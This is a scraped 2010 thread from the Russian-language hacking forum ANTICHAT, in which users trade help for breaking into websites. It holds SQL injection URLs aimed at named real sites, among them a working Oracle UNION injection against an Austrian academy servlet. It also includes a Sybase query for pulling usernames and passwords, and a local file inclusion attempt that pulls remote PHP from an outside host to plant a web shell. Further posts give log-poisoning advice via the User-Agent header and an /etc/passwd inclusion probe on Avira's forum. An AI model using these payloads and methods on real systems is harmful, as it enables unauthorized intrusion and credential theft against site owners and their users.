ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.11.2010, 19:40
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
как в sybase узнать общее количество записи, типа limit? или использовать только not in.
http://www.site.com/index.html?id=-4+or+1=convert(numeric,(select+max(convert(varchar ,username)||0x3a||password)+from+database..table))/**/
мне нужно узнать общее количетсво связки usernameassword
|
|
|
21.11.2010, 23:56
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Здесь есть скуля?
http://www.airportdriver.at/index.php?id=21&lang=en'
|
|
|
|
22.11.2010, 01:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Сообщение от FlaktW
FlaktW said:
Здесь есть скуля?
http://www.airportdriver.at/index.php?id=21&lang=en'
нет.
|
|
|
|
22.11.2010, 20:17
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855
Репутация:
0
|
|
http://xxx.com/index.php?id=
Делаю такой запрос ч-з адресную строку
Перехожу:
http://xxx.com/index.php?id=../../../../../../../../../../../../../../../var/log/httpd/error_log%00
в логах
[Mon Nov 22 16:10:39 2010] [error] [client 222.222.222.222] File does not exist: /home/hgjhgjhgjhgjhg/favicon.ico, referer: http://xxx.com/index.php?id=%3C?php%20include(%22http://123.narod.ru/list.php%22);%20?%3E%00 [Mon Nov 22 16:10:41 2010] [error]
т.е. не пишется что он передался ч-з гет. хотя другие записи с гет есть.
access_log огромных размеров но в вверху вообще нет записей моего ip.
Ч-з какую прогу можно отправить правильный запрос чтобы залить шелл(inetcrack или аналоги) help plz
|
|
|
|
22.11.2010, 20:21
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
2 ALIM
смотри в акцесс_лог е, должно запысыватся USER_AGENT
если есть, то через тампер дату легко залить
|
|
|
|
22.11.2010, 20:29
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855
Репутация:
0
|
|
Сообщение от Konqi
Konqi said:
2 ALIM
смотри в акцесс_лог е, должно запысыватся USER_AGENT
если есть, то через тампер дату легко залить
Да сейчас посмотрел есть юзер-агент, спасибо)
|
|
|
|
22.11.2010, 21:34
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Здесь возможно обойти фильтрацию?
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+asdunionasdselec tasd+1,2,3,4,5,6,7,8,9,10,11,12+--+
|
|
|
|
23.11.2010, 09:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
31258
Репутация:
7
|
|
Сообщение от FlaktW
FlaktW said:
Здесь возможно обойти фильтрацию?
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+asdunionasdselec tasd+1,2,3,4,5,6,7,8,9,10,11,12+--+
это оракл:
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+1111,null,null,null,null,null,null,null,null, null,null,null+from+sys.dual--
вывод в верхнем меню, где deutsch:
href="/oeaw_servlet/PersonenDetailsGeneric?id= 1111"
с ораклом не сталкивался, поэтому как дальше крутить пока не могу подсказать
|
|
|
|
23.11.2010, 21:21
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от freezed
freezed said:
это оракл:
http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+se lect+1111,null,null,null,null,null,null,null,null, null,null,null+from+sys.dual--
вывод в верхнем меню, где deutsch:
href="/oeaw_servlet/PersonenDetailsGeneric?id=
1111
"
с ораклом не сталкивался, поэтому как дальше крутить пока не могу подсказать
Thanks! и +++++++++++
|
|
|
|
24.11.2010, 07:42
|
|
Познающий
Регистрация: 03.01.2010
Сообщений: 42
Провел на форуме:
162143
Репутация:
3
|
|
забрел на форум avira, оказался на ссылке http://forum.avira.com/wbb/index.php?page=LegalNotice, подставив вместо LegalNotice index, я вышел на index.php, т. е. http://forum.avira.com/wbb/index.php == http://forum.avira.com/wbb/index.php?page=index
является ли это инклудом(пытался другие страницы, /etc/passwd%00 и т.д., пишет, что страница не найдена)?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
